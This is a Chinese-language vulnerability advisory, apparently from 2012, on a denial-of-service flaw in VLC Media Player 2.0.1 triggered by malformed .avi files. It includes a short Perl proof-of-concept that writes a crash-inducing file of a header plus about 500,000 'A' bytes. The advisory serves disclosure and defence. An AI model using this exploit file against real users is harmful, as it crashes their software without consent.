VLC Media Player '.avi' 文件处理拒绝服务漏洞
VLC Media Player '.avi' 文件处理拒绝服务漏洞
发布日期:2012-06-28
更新日期:2012-06-29
受影响系统:
VideoLAN VLC Media Player 2.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54208
VLC Media Player是多媒体播放器(最初命名为VideoLAN客户端)是VideoLAN计划的多媒体播放器。
VideoLAN VLC Media Player 2.0.1在处理畸形.avi文件时存在远程拒绝服务漏洞,可导致受影响应用崩溃。
<*来源:Dark-Puzzle
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;
my $file = "dark.avi";
open ($File, ">$file");
print $File $h,$d;
close ($File);
建议:
--------------------------------------------------------------------------------
厂商补丁:
VideoLAN
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.videolan.org/
评论暂时关闭